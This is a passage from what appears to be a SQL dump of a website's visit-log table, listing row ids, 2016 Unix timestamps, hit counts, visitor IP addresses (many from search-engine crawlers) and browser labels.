'151.80.31.106','other'),(54538,1470475899,1,1,0,0,'91.196.178.98','chrome'),(54539,1470476121,1,1,0,0,'164.132.161.27','other'),(54540,1470476163,1,1,0,0,'130.193.51.79','other'),(54541,1470476233,1,1,0,0,'91.206.33.236','chrome'),(54542,1470476558,1,1,0,0,'164.132.161.70','other'),(54543,1470477992,1,1,0,0,'164.132.161.27','other'),(54544,1470480399,1,1,0,0,'164.132.161.16','other'),(54545,1470481417,1,1,0,0,'130.193.51.19','other'),(54546,1470482139,1,1,0,0,'51.255.66.124','other'),(54547,1470482152,1,0,1,0,'66.249.64.185',''),(54548,1470482212,1,1,0,0,'51.255.65.51','other'),(54549,1470482963,1,1,0,0,'91.196.178.40','chrome'),(54550,1470483570,1,1,0,0,'130.193.51.19','other'),(54551,1470484087,1,0,1,0,'66.249.64.187',''),(54552,1470484952,1,0,1,0,'66.249.64.189',''),(54553,1470485081,1,0,1,0,'66.249.64.185',''),(54554,1470485107,1,1,0,0,'91.206.33.236','chrome'),(54555,1470485727,1,1,0,0,'208.115.113.92','other'),(54556,1470486771,1,1,0,0,'164.132.161.17','other'),(54557,1470487178,1,1,0,0,'151.80.31.167','other'),(54558,1470487736,1,1,0,0,'164.132.161.2','other'),(54559,1470487974,1,1,0,0,'91.196.178.40','chrome'),(54560,1470488106,1,0,1,0,'66.249.64.189',''),(54561,1470489056,1,1,0,0,'51.255.65.7','other'),(54562,1470489440,1,1,0,0,'164.132.161.32','other'),(54563,1470489463,1,1,0,0,'130.193.51.79','other'),(54564,1470490451,1,1,0,0,'164.132.161.90','other'),(54565,1470491613,1,1,0,0,'51.255.65.66','other'),(54566,1470492605,1,1,0,0,'51.255.65.28','other'),(54567,1470492637,1,0,1,0,'66.249.64.149',''),(54568,1470493487,1,0,1,0,'66.249.64.187',''),(54569,1470494355,1,1,0,0,'151.80.31.182','other'),(54570,1470494809,1,1,0,0,'93.158.152.84','other'),(54571,1470495038,1,1,0,0,'164.132.161.20','other'),(54572,1470495271,1,1,0,0,'51.255.65.70','other'),(54573,1470495366,1,1,0,0,'164.132.161.59','other'),(54574,1470495685,1,1,0,0,'66.249.93.109','chrome'),(54575,1470496303,1,1,0,0,'91.196.178.101','chrome'),(54576,1470496367,1,1,0,0,'208.115.113.82','other'),(54577,1470497463,1,1,0,0,'164.132.161.50','other'),(54578,1470497611,1,1,0,0,'91.196.178.38','firefox'),(54579,1470498277,1,1,0,0,'151.80.31.184','other'),(54580,1470498493,1,1,0,0,'207.46.13.96','other'),(54581,1470498498,1,1,0,0,'164.132.161.5','other'),(54582,1470498517,1,1,0,0,'91.196.178.101','chrome'),(54583,1470499476,1,1,0,0,'91.124.239.118','firefox'),(54584,1470499498,1,1,0,0,'151.80.31.178','other'),(54585,1470499892,1,1,0,0,'91.196.178.101','chrome'),(54586,1470500063,1,0,1,0,'66.249.64.155',''),(54587,1470500450,1,1,0,0,'151.80.31.182','other'),(54588,1470501117,1,1,0,0,'164.132.161.84','other'),(54589,1470501815,1,1,0,0,'157.55.39.184','other'),(54590,1470502020,1,1,0,0,'207.46.13.19','other'),(54591,1470502049,1,1,0,0,'51.255.65.13','other'),(54592,1470502448,1,0,1,0,'66.249.64.189',''),(54593,1470502493,1,0,1,0,'66.249.64.187',''),(54594,1470504613,1,1,0,0,'164.132.161.46','other'),(54595,1470504953,1,0,1,0,'66.249.64.187',''),(54596,1470504995,1,0,1,0,'66.249.64.149',''),(54597,1470506295,1,1,0,0,'51.255.65.36','other'),(54598,1470506684,1,1,0,0,'164.132.161.59','other'),(54599,1470506767,1,1,0,0,'212.55.84.33','chrome'),(54600,1470506989,1,1,0,0,'51.255.65.41','other'),(54601,1470507483,1,1,0,0,'91.196.178.101','chrome'),(54602,1470507545,1,0,1,0,'66.249.64.187',''),(54603,1470507561,1,1,0,0,'164.132.161.85','other'),(54604,1470507603,1,1,0,0,'151.80.31.171','other'),(54605,1470508357,1,1,0,0,'51.255.65.18','other'),(54606,1470508378,1,1,0,0,'151.80.31.100','other'),(54607,1470508979,1,1,0,0,'51.255.65.62','other'),(54608,1470509405,1,1,0,0,'151.80.31.175','other'),(54609,1470509727,1,1,0,0,'151.80.31.172','other'),(54610,1470509750,1,1,0,0,'164.132.161.67','other'),(54611,1470509772,1,0,1,0,'66.249.64.149',''),(54612,1470510178,1,1,0,0,'130.193.51.74','other'),(54613,1470510249,1,1,0,0,'164.132.161.50','other'),(54614,1470510275,1,1,0,0,'141.8.183.25','other'),(54615,1470510402,1,1,0,0,'130.193.37.7','other'),(54616,1470510729,1,1,0,0,'95.158.62.51','chrome'),(54617,1470510971,1,1,0,0,'151.80.31.159','other'),(54618,1470511954,1,1,0,0,'66.249.64.187','chrome'),(54619,1470512166,1,1,0,0,'66.249.64.152','chrome'),(54620,1470512818,1,1,0,0,'141.8.183.25','other'),(54621,1470513765,1,0,1,0,'66.249.64.152',''),(54622,1470514095,1,1,0,0,'151.80.31.184','other'),(54623,1470514169,1,1,0,0,'130.193.51.19','other'),(54624,1470514603,1,1,0,0,'130.193.50.34','other'),(54625,1470515099,1,1,0,0,'151.80.31.102','other'),(54626,1470515153,1,1,0,0,'164.132.161.61','other'),(54627,1470515470,1,1,0,0,'164.132.161.91','other'),(54628,1470515624,1,1,0,0,'164.132.161.27','other'),(54629,1470515974,1,1,0,0,'164.132.161.48','other'),(54630,1470516054,1,0,1,0,'66.249.64.149',''),(54631,1470516953,1,1,0,0,'164.132.161.70','other'),(54632,1470517146,1,1,0,0,'180.76.15.28','other'),(54633,1470517953,1,1,0,0,'207.46.13.19','other'),(54634,1470518202,1,1,0,0,'82.145.211.211','other'),(54635,1470518964,1,1,0,0,'82.145.211.211','opera'),(54636,1470519175,1,1,0,0,'130.193.50.34','other'),(54637,1470519613,1,1,0,0,'208.115.113.92','other'),(54638,1470519788,1,1,0,0,'180.76.15.156','other'),(54639,1470520570,2,2,0,0,'130.193.50.34','other'),(54640,1470520708,1,1,0,0,'141.8.183.25','other'),(54641,1470520754,89,89,0,0,'69.30.198.186','other'),(54642,1470521303,1,1,0,0,'130.193.51.74','other'),(54643,1470522113,1,1,0,0,'164.132.161.83','other'),(54644,1470522178,1,1,0,0,'51.255.65.6','other'),(54645,1470523792,1,1,0,0,'82.145.209.163','opera'),(54646,1470525049,1,1,0,0,'151.80.31.183','other'),(54647,1470525561,1,1,0,0,'151.80.31.101','other'),(54648,1470525871,1,1,0,0,'164.132.161.93','other'),(54649,1470526011,1,1,0,0,'141.8.142.67','other'),(54650,1470526163,1,0,1,0,'66.249.64.189',''),(54651,1470526661,1,1,0,0,'141.8.142.58','other'),(54652,1470526949,1,1,0,0,'141.8.142.61','other'),(54653,1470527071,1,1,0,0,'164.132.161.9','other'),(54654,1470527074,1,1,0,0,'130.193.50.34','other'),(54655,1470527287,1,1,0,0,'207.46.13.19','other'),(54656,1470529106,1,1,0,0,'130.193.50.34','other'),(54657,1470529722,1,1,0,0,'130.193.51.19','other'),(54658,1470530544,1,1,0,0,'51.255.65.90','other'),(54659,1470531198,1,1,0,0,'208.115.113.82','other'),(54660,1470531857,1,1,0,0,'151.80.31.169','other'),(54661,1470532197,1,1,0,0,'128.75.121.229','msie'),(54662,1470532199,1,1,0,0,'128.68.43.55','msie'),(54663,1470532200,1,1,0,0,'95.221.215.29','msie'),(54664,1470532203,1,1,0,0,'178.140.10.165','msie'),(54665,1470532293,1,1,0,0,'207.46.13.19','other'),(54666,1470532554,1,1,0,0,'208.115.113.92','other'),(54667,1470533164,1,1,0,0,'141.8.142.58','other'),(54668,1470533503,1,0,1,0,'66.249.64.152',''),(54669,1470534172,1,1,0,0,'130.193.51.19','other'),(54670,1470534502,1,1,0,0,'208.115.113.92','other'),(54671,1470534765,1,1,0,0,'164.132.161.69','other'),(54672,1470535102,1,1,0,0,'151.80.31.100','other'),(54673,1470535185,1,1,0,0,'164.132.161.76','other'),(54674,1470538610,3,3,0,0,'95.85.21.59','other'),(54675,1470539609,2,2,0,0,'95.85.21.59','other'),(54676,1470539858,1,0,1,0,'66.249.64.149',''),(54677,1470540456,1,1,0,0,'151.80.31.161','other'),(54678,1470541223,1,1,0,0,'51.255.65.38','other'),(54679,1470541403,1,1,0,0,'51.255.65.56','other'),(54680,1470541557,1,1,0,0,'151.80.31.176','other'),(54681,1470542322,1,1,0,0,'151.80.31.162','other'),(54682,1470542813,1,1,0,0,'51.255.65.7','other'),(54683,1470542860,1,1,0,0,'69.30.198.186','other'),(54684,1470543076,1,0,1,0,'66.249.64.152',''),(54685,1470543515,1,0,1,0,'66.249.64.185',''),(54686,1470543833,1,1,0,0,'130.193.50.34','other'),(54687,1470544971,1,0,1,0,'66.249.64.187',''),(54688,1470544984,1,1,0,0,'164.132.161.45','other'),(54689,1470545049,1,0,1,0,'66.249.64.152',''),(54690,1470545084,1,1,0,0,'51.255.65.18','other'),(54691,1470545171,1,1,0,0,'51.255.65.16','other'),(54692,1470545173,1,1,0,0,'51.255.65.73','other'),(54693,1470545335,1,1,0,0,'151.80.31.180','other'),(54694,1470545454,1,1,0,0,'141.8.142.58','other'),(54695,1470545677,1,1,0,0,'207.46.13.19','other'),(54696,1470545964,1,1,0,0,'212.55.84.33','chrome'),(54697,1470546463,1,1,0,0,'217.69.136.206','other'),(54698,1470546642,1,1,0,0,'207.46.13.19','other'),(54699,1470546913,1,1,0,0,'151.80.31.102','other'),(54700,1470547200,1,1,0,0,'51.255.65.91','other'),(54701,1470547204,1,0,1,0,'66.249.64.185',''),(54702,1470548152,1,1,0,0,'51.255.65.85','other'),(54703,1470548783,1,1,0,0,'164.132.161.95','other'),(54704,1470548833,1,0,1,0,'66.249.64.187',''),(54705,1470550096,1,0,1,0,'66.249.64.187',''),(54706,1470551027,1,1,0,0,'176.77.25.130','other'),(54707,1470551671,1,1,0,0,'141.8.142.58','other'),(54708,1470551941,1,1,0,0,'207.46.13.19','other'),(54709,1470552182,1,1,0,0,'130.193.50.34','other'),(54710,1470552402,1,1,0,0,'141.8.183.25','other'),(54711,1470552538,1,0,1,0,'66.249.64.189',''),(54712,1470554757,1,1,0,0,'208.115.113.82','other'),(54713,1470554937,1,1,0,0,'141.8.183.25','other'),(54714,1470555126,1,1,0,0,'164.132.161.40','other'),(54715,1470555922,1,0,1,0,'66.249.64.155',''),(54716,1470556148,1,1,0,0,'51.255.65.6','other'),(54717,1470556596,1,1,0,0,'141.8.142.61','other'),(54718,1470556598,1,1,0,0,'141.8.142.58','other'),(54719,1470557024,2,2,0,0,'69.30.210.242','other'),(54720,1470557416,1,1,0,0,'95.84.136.134','chrome'),(54721,1470557418,1,1,0,0,'176.77.26.168','opera'),(54722,1470557419,1,1,0,0,'46.73.150.69','chrome'),(54723,1470557420,1,1,0,0,'37.110.109.160','opera'),(54724,1470557477,1,0,1,0,'66.249.64.149',''),(54725,1470557556,1,1,0,0,'51.255.65.38','other'),(54726,1470557672,1,0,1,0,'66.249.64.187',''),(54727,1470557802,1,1,0,0,'130.193.50.34','other'),(54728,1470558118,1,0,1,0,'66.249.64.189',''),(54729,1470558755,1,1,0,0,'164.132.161.83','other'),(54730,1470558886,1,0,1,0,'66.249.64.185',''),(54731,1470559519,1,1,0,0,'51.255.65.45','other'),(54732,1470560991,1,1,0,0,'141.0.14.115','opera'),(54733,1470561056,2,0,2,0,'66.249.64.185',''),(54734,1470561322,1,1,0,0,'151.80.31.101','other'),(54735,1470561868,1,1,0,0,'130.193.50.34','other'),(54736,1470561872,1,1,0,0,'51.255.65.94','other'),(54737,1470561999,1,1,0,0,'141.8.183.25','other'),(54738,1470562948,1,1,0,0,'141.8.183.25','other'),(54739,1470563343,1,1,0,0,'51.255.65.13','other'),(54740,1470563800,5,5,0,0,'149.202.48.192','other'),(54741,1470563848,4,4,0,0,'144.76.29.162','other'),(54742,1470564365,1,1,0,0,'51.255.65.96','other'),(54743,1470564440,1,1,0,0,'164.132.161.67','other'),(54744,1470564625,1,1,0,0,'141.8.183.25','other'),(54745,1470565277,1,1,0,0,'51.255.65.57','other'),(54746,1470565826,1,1,0,0,'151.80.31.176','other'),(54747,1470565908,1,1,0,0,'46.174.125.214','chrome'),(54748,1470566251,1,1,0,0,'164.132.161.38','other'),(54749,1470566318,2,2,0,0,'51.254.121.187','other'),(54750,1470567011,2,2,0,0,'130.193.51.19','other'),(54751,1470568111,1,1,0,0,'130.193.50.34','other'),(54752,1470568239,1,1,0,0,'141.8.183.25','other'),(54753,1470568655,2,0,2,0,'66.249.64.187',''),(54754,1470568933,1,1,0,0,'164.132.161.17','other'),(54755,1470569472,1,1,0,0,'51.255.65.84','other'),(54756,1470569519,1,1,0,0,'212.55.84.33','chrome'),(54757,1470569774,1,0,1,0,'66.249.64.185',''),(54758,1470570640,2,2,0,0,'213.239.205.207','other'),(54759,1470570883,1,0,1,0,'66.249.64.189',''),(54760,1470571051,1,1,0,0,'164.132.161.84','other'),(54761,1470572358,2,2,0,0,'130.193.51.19','other'),(54762,1470572605,1,1,0,0,'141.8.142.61','other'),(54763,1470572731,2,2,0,0,'141.8.183.25','other'),(54764,1470572825,1,1,0,0,'95.169.3.49','chrome'),(54765,1470573405,2,2,0,0,'188.40.95.70','other'),(54766,1470573457,1,1,0,0,'130.193.51.19','other'),(54767,1470574619,1,1,0,0,'130.193.50.34','other'),(54768,1470574951,1,0,1,0,'66.249.64.185',''),(54769,1470575014,3,3,0,0,'85.14.244.98','other'),(54770,1470575016,2,2,0,0,'193.111.140.106','other'),(54771,1470577222,1,0,1,0,'66.249.64.187',''),(54772,1470577416,2,0,2,0,'66.249.64.149',''),(54773,1470578305,1,1,0,0,'51.255.65.40','other'),(54774,1470578360,1,1,0,0,'51.255.65.80','other'),(54775,1470578901,1,1,0,0,'208.115.113.92','other'),(54776,1470579492,1,0,1,0,'66.249.64.187',''),(54777,1470580017,1,1,0,0,'151.80.31.166','other'),(54778,1470580347,1,1,0,0,'51.255.65.81','other'),(54779,1470580671,1,1,0,0,'130.193.51.14','other'),(54780,1470580757,2,2,0,0,'141.8.142.61','other'),(54781,1470580788,1,0,1,0,'66.249.64.152',''),(54782,1470580859,2,2,0,0,'130.193.51.19','other'),(54783,1470581078,1,1,0,0,'130.193.51.79','other'),(54784,1470581191,1,1,0,0,'141.8.142.58','other'),(54785,1470581951,1,1,0,0,'130.193.50.34','other'),(54786,1470582455,1,0,1,0,'66.249.64.187',''),(54787,1470583962,1,1,0,0,'130.193.51.19','other'),(54788,1470584470,1,1,0,0,'94.178.23.205','chrome'),(54789,1470586823,2,2,0,0,'130.193.51.19','other'),(54790,1470587684,1,1,0,0,'66.249.64.21','chrome'),(54791,1470588288,1,1,0,0,'51.255.65.88','other'),(54792,1470588301,1,1,0,0,'130.193.51.19','other'),(54793,1470588399,1,1,0,0,'130.193.37.7','other'),(54794,1470588419,1,0,1,0,'66.249.64.24',''),(54795,1470589168,1,1,0,0,'66.249.64.59','chrome'),(54796,1470589639,1,1,0,0,'51.255.65.39','other'),(54797,1470589890,1,0,1,0,'66.249.64.61',''),(54798,1470590056,1,1,0,0,'51.255.194.31','other'),(54799,1470590631,1,1,0,0,'95.132.45.76','chrome'),(54800,1470590965,1,1,0,0,'130.193.51.19','other'),(54801,1470591261,1,1,0,0,'130.193.50.34','other'),(54802,1470591947,1,1,0,0,'208.115.113.92','other'),(54803,1470592196,1,1,0,0,'130.193.50.34','other'),(54804,1470593286,1,1,0,0,'154.72.160.227','firefox'),(54805,1470593462,1,0,1,0,'66.249.64.27',''),(54806,1470594031,1,1,0,0,'164.132.161.65','other'),(54807,1470594997,1,1,0,0,'195.10.210.49','chrome'),(54808,1470595012,1,1,0,0,'130.193.50.34','other'),(54809,1470595382,1,1,0,0,'151.80.31.155','other'),(54810,1470596042,1,1,0,0,'151.80.31.175','other'),(54811,1470596351,1,1,0,0,'91.196.178.100','chrome'),(54812,1470596475,1,1,0,0,'176.77.3.124','msie'),(54813,1470596538,1,1,0,0,'94.140.226.98','chrome'),(54814,1470596922,1,1,0,0,'51.255.65.80','other'),(54815,1470597291,1,1,0,0,'51.255.65.60','other'),(54816,1470597920,1,1,0,0,'130.193.50.34','other'),(54817,1470597922,1,1,0,0,'82.145.216.237','opera'),(54818,1470598122,1,1,0,0,'91.196.178.100','chrome'),(54819,1470598418,1,1,0,0,'141.8.183.25','other'),(54820,1470598629,1,1,0,0,'164.132.161.45','other'),(54821,1470599447,1,1,0,0,'95.25.208.253','msie'),(54822,1470599949,1,1,0,0,'95.31.184.175','msie'),(54823,1470600029,1,1,0,0,'91.196.178.100','chrome'),(54824,1470600513,1,1,0,0,'51.255.65.9','other'),(54825,1470600695,1,1,0,0,'164.132.161.89','other'),(54826,1470600791,1,1,0,0,'51.255.65.59','other'),(54827,1470600810,1,1,0,0,'141.0.15.160','opera'),(54828,1470601109,1,1,0,0,'164.132.161.41','other'),(54829,1470601216,1,1,0,0,'51.255.65.41','other'),(54830,1470603496,1,1,0,0,'141.0.14.119','opera'),(54831,1470604117,1,1,0,0,'207.46.13.184','other'),(54832,1470604137,1,0,1,0,'66.249.64.27',''),(54833,1470605063,1,1,0,0,'79.160.153.206','other'),(54834,1470606976,1,1,0,0,'207.46.13.184','other'),(54835,1470607006,1,1,0,0,'51.255.65.29','other'),(54836,1470608909,1,1,0,0,'51.255.65.84','other'),(54837,1470609793,1,1,0,0,'141.0.15.103','opera'),(54838,1470610291,1,1,0,0,'207.46.13.192','other'),(54839,1470610943,1,1,0,0,'216.230.148.77','chrome'),(54840,1470612075,1,1,0,0,'164.132.161.44','other'),(54841,1470612203,1,0,1,0,'66.249.64.27',''),(54842,1470612213,1,0,1,0,'66.249.64.21',''),(54843,1470612485,1,1,0,0,'51.255.65.2','other'),(54844,1470612936,1,1,0,0,'51.255.65.10','other'),(54845,1470613165,1,1,0,0,'51.255.65.83','other'),(54846,1470613303,1,0,1,0,'66.249.66.183',''),(54847,1470615897,1,1,0,0,'164.132.161.82','other'),(54848,1470617449,1,1,0,0,'51.255.65.69','other'),(54849,1470618322,33,33,0,0,'173.208.157.186','other'),(54850,1470619094,1,1,0,0,'151.80.31.157','other'),(54851,1470619436,1,1,0,0,'164.132.161.33','other'),(54852,1470621498,1,1,0,0,'151.80.31.172','other'),(54853,1470622468,1,0,1,0,'66.249.66.188',''),(54854,1470624751,1,1,0,0,'51.255.65.66','other'),(54855,1470624937,1,1,0,0,'51.255.65.88','other'),(54856,1470626275,1,1,0,0,'51.255.65.12','other'),(54857,1470627481,1,1,0,0,'51.255.65.45','other'),(54858,1470628090,1,1,0,0,'208.115.113.82','other'),(54859,1470628109,1,1,0,0,'51.255.65.12','other'),(54860,1470629015,1,1,0,0,'176.77.84.138','chrome'),(54861,1470629147,1,1,0,0,'130.193.51.19','other'),(54862,1470629271,1,1,0,0,'93.158.152.84','other'),(54863,1470629285,1,1,0,0,'207.46.13.192','other'),(54864,1470629396,1,1,0,0,'141.8.183.25','other'),(54865,1470629426,1,1,0,0,'176.77.14.71','opera'),(54866,1470629652,1,1,0,0,'51.255.65.6','other'),(54867,1470629914,1,1,0,0,'141.0.15.163','other'),(54868,1470630260,1,1,0,0,'46.42.174.154','opera'),(54869,1470630431,1,1,0,0,'208.115.113.92','other'),(54870,1470630691,1,1,0,0,'66.249.64.24','chrome'),(54871,1470630744,1,1,0,0,'188.32.240.51','chrome'),(54872,1470631363,1,1,0,0,'51.255.65.89','other'),(54873,1470631634,1,0,1,0,'66.249.64.24',''),(54874,1470632686,1,1,0,0,'212.55.84.33','chrome'),(54875,1470633032,1,1,0,0,'91.124.239.118','firefox'),(54876,1470633585,1,1,0,0,'164.132.161.37','other'),(54877,1470634067,1,1,0,0,'212.55.84.33','chrome'),(54878,1470634129,1,1,0,0,'66.249.93.117','chrome'),(54879,1470635369,1,0,1,0,'66.249.64.21',''),(54880,1470636069,1,1,0,0,'164.132.161.75','other'),(54881,1470636279,43,43,0,0,'94.199.151.22','other'),(54882,1470636345,2,2,0,0,'37.55.192.50','chrome'),(54883,1470637103,1,1,0,0,'164.132.161.52','other'),(54884,1470637221,1,1,0,0,'141.8.183.25','other'),(54885,1470637327,1,1,0,0,'91.196.178.66','firefox'),(54886,1470638267,1,1,0,0,'208.115.113.82','other'),(54887,1470638945,1,1,0,0,'193.150.59.230','firefox'),(54888,1470638954,1,1,0,0,'130.193.51.19','other'),(54889,1470639151,1,1,0,0,'141.0.14.32','opera'),(54890,1470639179,1,1,0,0,'195.49.164.199','chrome'),(54891,1470640483,1,1,0,0,'91.204.87.179','chrome'),(54892,1470641232,1,1,0,0,'91.196.178.65','firefox'),(54893,1470641314,1,1,0,0,'66.249.93.113','chrome'),(54894,1470642277,1,0,1,0,'66.249.64.24',''),(54895,1470642806,1,1,0,0,'82.145.211.217','other'),(54896,1470643624,1,1,0,0,'207.46.13.192','other'),(54897,1470643638,1,1,0,0,'141.0.15.205','opera'),(54898,1470643743,1,1,0,0,'82.145.211.217','other'),(54899,1470643953,1,1,0,0,'180.76.15.12','other'),(54900,1470644790,1,1,0,0,'91.196.178.67','firefox'),(54901,1470645242,1,0,1,0,'66.249.64.21',''),(54902,1470646002,2,0,2,0,'66.249.64.24',''),(54903,1470646021,1,1,0,0,'207.46.13.184','other'),(54904,1470646802,1,1,0,0,'94.178.23.205','chrome'),(54905,1470648324,1,1,0,0,'141.0.14.192','opera'),(54906,1470648499,1,1,0,0,'94.178.23.205','chrome'),(54907,1470648714,1,0,1,0,'66.249.64.21',''),(54908,1470648874,1,1,0,0,'151.80.31.180','other'),(54909,1470649265,1,1,0,0,'164.132.161.22','other'),(54910,1470649497,1,1,0,0,'194.187.106.118','firefox'),(54911,1470649952,1,1,0,0,'164.132.161.70','other'),(54912,1470650228,1,1,0,0,'151.80.31.169','other'),(54913,1470650290,1,1,0,0,'51.255.65.50','other'),(54914,1470651197,1,0,1,0,'66.249.64.61',''),(54915,1470651381,1,1,0,0,'164.132.161.54','other'),(54916,1470652397,1,1,0,0,'82.145.219.97','opera'),(54917,1470652988,1,1,0,0,'51.255.65.65','other'),(54918,1470653189,1,0,1,0,'66.249.64.21',''),(54919,1470654127,1,1,0,0,'164.132.161.18','other'),(54920,1470654195,1,1,0,0,'164.132.161.72','other'),(54921,1470654235,1,1,0,0,'141.0.14.135','opera'),(54922,1470654244,1,1,0,0,'180.76.15.28','other'),(54923,1470654288,1,1,0,0,'51.255.65.24','other'),(54924,1470654322,1,1,0,0,'212.1.101.100','chrome'),(54925,1470655057,1,1,0,0,'51.255.65.66','other'),(54926,1470655111,1,1,0,0,'51.255.65.68','other'),(54927,1470655166,1,0,1,0,'66.249.64.24',''),(54928,1470655578,1,1,0,0,'208.115.113.92','other'),(54929,1470656040,1,1,0,0,'82.145.219.198','opera'),(54930,1470656045,1,1,0,0,'92.113.1.141','chrome'),(54931,1470656588,1,1,0,0,'91.196.178.164','chrome'),(54932,1470656677,1,1,0,0,'151.80.31.161','other'),(54933,1470657030,1,1,0,0,'62.221.70.154','chrome'),(54934,1470657059,1,1,0,0,'207.46.13.19','other'),(54935,1470657169,1,1,0,0,'178.94.67.135','chrome'),(54936,1470657638,1,1,0,0,'66.249.64.27','chrome'),(54937,1470657808,1,1,0,0,'66.249.64.57','chrome'),(54938,1470658464,1,1,0,0,'5.45.192.77','chrome'),(54939,1470659034,1,1,0,0,'164.132.161.56','other'),(54940,1470659166,1,1,0,0,'141.0.15.197','opera'),(54941,1470659622,1,1,0,0,'164.132.161.52','other'),(54942,1470660145,1,1,0,0,'51.255.65.13','other'),(54943,1470660922,1,1,0,0,'91.196.178.70','firefox'),(54944,1470661513,1,1,0,0,'94.179.120.250','firefox'),(54945,1470661745,1,1,0,0,'66.249.64.24','chrome'),(54946,1470661782,1,1,0,0,'151.80.31.101','other'),(54947,1470661879,2,2,0,0,'91.196.178.72','firefox'),(54948,1470662041,1,1,0,0,'66.102.9.103','chrome'),(54949,1470662203,1,0,1,0,'66.249.64.27',''),(54950,1470662732,1,1,0,0,'51.255.65.90','other'),(54951,1470663253,1,1,0,0,'91.121.181.101','other'),(54952,1470663557,1,1,0,0,'164.132.161.93','other'),(54953,1470663564,1,1,0,0,'51.255.65.50','other'),(54954,1470663608,1,1,0,0,'91.196.178.65','chrome'),(54955,1470664925,1,1,0,0,'141.0.12.131','chrome'),(54956,1470664979,1,1,0,0,'51.255.65.47','other'),(54957,1470665176,1,1,0,0,'151.80.31.173','other'),(54958,1470665368,1,1,0,0,'51.255.65.16','other'),(54959,1470666325,1,0,1,0,'66.249.64.21',''),(54960,1470667216,1,1,0,0,'91.196.178.38','firefox'),(54961,1470667342,2,2,0,0,'208.115.113.82','other'),(54962,1470668330,1,1,0,0,'51.255.65.68','other'),(54963,1470668428,1,1,0,0,'91.196.178.98','chrome'),(54964,1470668703,1,1,0,0,'164.132.161.63','other'),(54965,1470669418,1,0,1,0,'66.249.64.24',''),(54966,1470670264,1,1,0,0,'151.80.31.183','other'),(54967,1470671078,1,1,0,0,'51.255.65.78','other'),(54968,1470671093,1,1,0,0,'94.179.17.84','chrome'),(54969,1470671272,1,1,0,0,'207.46.13.192','other'),(54970,1470671850,1,1,0,0,'208.115.113.92','other'),(54971,1470671867,1,1,0,0,'164.132.161.24','other'),(54972,1470672187,1,1,0,0,'151.80.31.167','other'),(54973,1470672365,1,1,0,0,'91.196.178.98','chrome'),(54974,1470672457,1,1,0,0,'178.93.46.130','chrome'),(54975,1470672679,1,1,0,0,'5.199.236.224','chrome'),(54976,1470673936,1,1,0,0,'151.80.31.183','other'),(54977,1470674880,1,1,0,0,'51.255.65.74','other'),(54978,1470675101,1,1,0,0,'91.196.178.68','firefox'),(54979,1470675309,1,0,1,0,'66.249.64.21',''),(54980,1470675327,1,1,0,0,'51.255.65.68','other'),(54981,1470675492,1,1,0,0,'207.46.13.192','other'),(54982,1470675587,1,1,0,0,'164.132.161.91','other'),(54983,1470675999,1,1,0,0,'164.132.161.84','other'),(54984,1470676206,1,0,1,0,'66.249.64.61',''),(54985,1470676266,1,1,0,0,'151.80.31.181','other'),(54986,1470676374,1,0,1,0,'66.249.64.27',''),(54987,1470676411,1,1,0,0,'51.255.65.53','other'),(54988,1470676646,1,0,1,0,'66.249.64.57',''),(54989,1470676845,1,1,0,0,'188.115.129.149','chrome'),(54990,1470677130,1,0,1,0,'66.249.64.59',''),(54991,1470677971,1,0,1,0,'66.249.64.57',''),(54992,1470678041,1,0,1,0,'66.249.64.22',''),(54993,1470678249,1,1,0,0,'51.255.65.56','other'),(54994,1470679188,1,1,0,0,'91.196.178.98','chrome'),(54995,1470679225,1,1,0,0,'91.196.178.161','chrome'),(54996,1470680398,1,1,0,0,'82.145.219.71','opera'),(54997,1470680627,1,1,0,0,'193.161.12.87','chrome'),(54998,1470680784,1,0,1,0,'66.249.64.27',''),(54999,1470680853,1,1,0,0,'51.255.65.20','other'),(55000,1470682105,1,1,0,0,'164.132.161.85','other'),(55001,1470682452,1,1,0,0,'51.255.65.88','other'),(55002,1470683302,1,1,0,0,'164.132.161.18','other'),(55003,1470683424,1,1,0,0,'164.132.161.85','other'),(55004,1470683700,1,1,0,0,'164.132.161.25','other'),(55005,1470683865,1,1,0,0,'51.255.65.82','other'),(55006,1470685307,1,1,0,0,'208.115.113.92','other'),(55007,1470685759,1,1,0,0,'141.0.15.66','other'),(55008,1470685947,1,0,1,0,'66.249.64.149',''),(55009,1470686265,1,1,0,0,'164.132.161.82','other'),(55010,1470686294,1,1,0,0,'164.132.161.58','other'),(55011,1470686317,1,1,0,0,'51.255.65.18','other'),(55012,1470686656,1,1,0,0,'141.0.15.72','opera'),(55013,1470688736,1,0,1,0,'66.249.64.187',''),(55015,1470688822,1,1,0,0,'91.196.178.66','firefox'),(55016,1470689971,1,1,0,0,'51.255.65.72','other'),(55017,1470690325,1,0,1,0,'66.249.64.149',''),(55018,1470690467,1,1,0,0,'151.80.31.102','other'),(55019,1470690912,1,1,0,0,'164.132.161.32','other'),(55020,1470691374,1,1,0,0,'207.46.13.184','other'),(55021,1470691570,1,1,0,0,'51.255.65.77','other'),(55022,1470692037,1,1,0,0,'208.115.113.82','other'),(55023,1470692923,1,1,0,0,'51.255.65.65','other'),(55024,1470693068,1,1,0,0,'164.132.161.65','other'),(55025,1470694261,1,1,0,0,'164.132.161.32','other'),(55026,1470695589,1,1,0,0,'141.0.15.72','opera'),(55027,1470695612,1,0,1,0,'66.249.64.152',''),(55028,1470696096,1,0,1,0,'66.249.64.187',''),(55029,1470696220,1,1,0,0,'51.255.65.3','other'),(55030,1470696690,1,1,0,0,'51.255.65.45','other'),(55031,1470696763,2,2,0,0,'208.115.113.82','other'),(55032,1470697170,1,1,0,0,'180.76.15.154','other'),(55033,1470697352,1,1,0,0,'207.46.13.192','other'),(55034,1470697452,1,1,0,0,'217.69.133.230','other'),(55035,1470698199,1,1,0,0,'51.255.65.41','other'),(55036,1470698489,1,0,1,0,'66.249.64.187',''),(55037,1470699099,1,1,0,0,'207.46.13.19','other'),(55038,1470699334,1,1,0,0,'164.132.161.61','other'),(55039,1470699673,1,1,0,0,'208.115.113.92','other'),(55040,1470699708,2,2,0,0,'164.132.161.65','other'),(55041,1470699945,1,1,0,0,'207.46.13.184','other'),(55042,1470701537,1,1,0,0,'164.132.161.27','other'),(55043,1470701684,1,0,1,0,'66.249.64.187',''),(55044,1470703554,1,1,0,0,'180.76.15.139','other'),(55045,1470703877,1,1,0,0,'151.80.31.108','other'),(55046,1470704082,1,0,1,0,'66.249.64.185',''),(55047,1470704181,2,0,2,0,'66.249.64.187',''),(55048,1470706760,2,2,0,0,'159.203.4.142','other'),(55049,1470708385,1,0,1,0,'66.249.64.185',''),(55050,1470708986,1,1,0,0,'51.255.65.50','other'),(55051,1470709646,1,1,0,0,'51.255.65.94','other'),(55052,1470709